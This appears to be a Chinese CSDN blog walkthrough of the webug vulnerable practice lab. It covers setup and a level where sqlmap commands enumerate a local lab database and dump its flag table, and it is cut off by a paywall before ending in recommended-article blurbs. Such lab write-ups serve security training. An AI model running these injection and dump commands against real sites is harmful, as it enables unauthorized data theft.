webug靶场渗透基础攻略

最新推荐文章于 2024-09-20 20:35:26 发布
最新推荐文章于 2024-09-20 20:35:26 发布
阅读量5.5k 收藏 31
点赞数 7
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28719743/article/details/83274749
版权
本文详细介绍了webug靶场的渗透基础攻略,从安装到逐步攻破各个关卡,涉及SQL注入、文件下载、XFF注入、CSRF攻击等技术。在实践中发现并利用了多个漏洞,如源代码泄露、权限越权、文件路径遍历等,揭示了靶场中常见的安全问题。
摘要由CSDN通过智能技术生成

文章目录

安装

下载解压后,打开虚拟机
在这里插入图片描述
修改网络为桥接模式
在这里插入图片描述
虚拟机cmd中输入ipconfig查看局域网ip地址
在这里插入图片描述
我这边是192.168.0.101
浏览器访问一下
在这里插入图片描述
没毛病,第一步完成了,现在开始练习

第一关

在这里插入图片描述
这题目…一开始我就没明白要干什么
看了二三关的题目后,才明白过来是要找出id为1的值的flag
接下来我们使用sqlmap
查询当前的数据库名

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" --current-db

在这里插入图片描述
查表

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab --tables

在这里插入图片描述
查字段

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns

在这里插入图片描述
现在就可以查flag值了

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag -C flag,id --dump

在这里插入图片描述
答案就出来了,但是不用将这个值提交,因为看了源代码后发现提交页面并没有校验flag的功能,估计还没开发好

第二关

在这里插入图片描述
下载图片,用notepad打开一下
在这里插入图片描述
有个txt文件,解压后打开看看
在这里插入图片描述
貌似没更多信息
把’123’填入提交后,发现错了,再试’密码123’,‘123txt’都是错的,无奈下又看了下源代码,发现答案是’flang{fa136c7c341a6

最低0.47元/天 解锁文章
Tomatosky
关注
专栏目录
2021-8-13胎教webug4.0靶场学习环境搭建
qq_45290991的博客
08-13 506
一、下载安装配置(记得时刻保存快照这个好习惯) 链接:https://pan.baidu.com/s/1sz67padS6-dBOAvF-g9SbQ 提取码:iqf8 直接进去,解压这个压缩包: 然后VMware打开2003的虚拟机即可。 开机默认空密码,进去之后运行桌面上的PHPstudy,查看本地ip,然后即可访问(默认初始账号密码都是admin): 二、登录进去后开始刷题 其实挺拉垮的只有web靶场能用。 ...
全!CTF靶场渗透实战靶场总结 (适合收藏)
热门推荐
Appleteachers的博客
05-20 3万+
CTF靶场渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03 漏洞靶场(本地搭建) ▶0x04 渗透实战靶场 0x01 CTF赛事发布网站 i春秋和XCTF社区经常会发布各类CTF赛事 i春秋: https://www.
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
渗透测试练习靶场汇总
Thunderclap的博客
07-01 2万+
渗透测试 练习常用靶场汇总
Windows 10系统下WeBug4.0靶场搭建指南
最新发布
gitblog_06532的博客
09-20 816
Windows 10系统下WeBug4.0靶场搭建指南 Windows10系统下WeBug4.0靶场搭建 项目地址: https://gitcode.com/Resource-Bundle-Collection/c086b ...
渗透测试靶场
菜鸟-传奇
10-24 7397
渗透测试靶场 sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用下载地址:https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用下载地址:http://xss-quiz.int21h...
渗透靶场——vulntarget-a综合靶场
tlovejr的博客
03-24 5040
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
Webug靶场搭建详解
永远是少年
12-16 2205
今天继续给大家介绍渗透测试相关知识,本文主要内容是Webug靶场搭建详解。 一、Webug靶场简介 二、Webug靶场搭建
渗透靶场——Vulnhub:Chill_Hack
tlovejr的博客
02-28 775
首先还是老规矩,扫描存活主机 然后开始信息收集,扫描端口 发现21端口已经开放,而且还是不用密码就可以直接登录 用户名是anonymous登录ftp,然后得到note.txt后,发现得到了一句话,先放着,留着备用 然后直接上目录扫描dirb 这个靶场简单扫描一下即可,不需要进行详细扫描等 按个访问一下扫描出的目录 看见了一个命令执行框,直接whoami一下看看 看看别的命令ifconfig 看看密码文件 发现要看密码文件的时候不让看了 简单的绕过试下
渗透靶场——HackMyVM:Sedem
tlovejr的博客
03-29 2686
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址 192.168.1.7 扫描端口 扫描靶机开放的服务端口 nmap -p- -A 192.168.1.7 发现也就是22和80端口正常开放,那接下来还是老套路,对80web端口开始渗透 Web渗透 http://192.168.
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6216
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
Webug靶场之旅
weixin_53953503的博客
08-18 391
Webug靶场的搭建 在kali里面搭建webug靶场,首先需要装docker容器,接着下载webug靶场,然后将下载好的webug靶场拖下来,建立自己的靶场平台,具体步骤见下方所述,注意该文章中的靶场是搭建在kali环境下的。 查看kali版本 命令:lsb_release -a 更新安装包 命令:sudo apt update 下载镜像 命令:sudo apt install docker.io 过程过长,耐心等待 查看docker版本 命令:docker version
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1
LYJ20010728的博客
08-25 646
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1题目描述环境下载NULLY CYBERSECURITY: 1靶机搭建渗透测试信息搜集漏洞挖掘getshwll提权 题目描述 Nully Cybersecurity - this is an easy-intermediate realistic machine. While working with the machine, you will need to brute force, pivoting (using metasp
Webug4.0靶场通关
梦里明明有六趣,觉后空空无大千
02-05 3531
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
常用渗透测试靶场
山己见的博客
11-25 5470
1 DVWA 推荐新手首选靶场,配置简单,需下载phpstudy和靶场文件包,简单部署之后即可访问。 包含了常见的web漏洞(php的),每个漏洞分为四个等级,每个等级都有源码查看,最高等级的源码是最安全的。 DVWA靶场源码下载:http://www.dvwa.co.uk/index.php phpstudy官方下载:https://m.xp.cn/ 2 网络安全实验室 做题的靶场,也是一个基础靶场,是一个在线的靶场。 地址:http://hackinglab.cn/ 3 sqli-labs sqli-l
常见渗透测试靶场学习笔记
weixin_34220834的博客
04-24 2632
1.DVWA   作为新手,通常第一个听说的靶场应该就是DVWA,部署简单安装完对应版本的PAM(PHP-Apache-MySQL),简单配置后就可以使用。   1、DVWA靶场可测试漏洞:暴力破解(Brute Force)、命令注入(CommandInjection)、跨站请求伪造(CSRF)、文件包含(File Inclusion)、文件上传(File Upload)、不安全的验证码(I...
视频教程:渗透测试靶场搭建全过程详解
视频解说详细搭建过程》文件是一份面向渗透测试初学者的教育资源,该资源旨在帮助学习者搭建一个模拟真实环境的靶场,以进行渗透测试的学习和练习。文件内容包含渗透测试的全过程解说、靶场搭建的关键步骤、所需软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值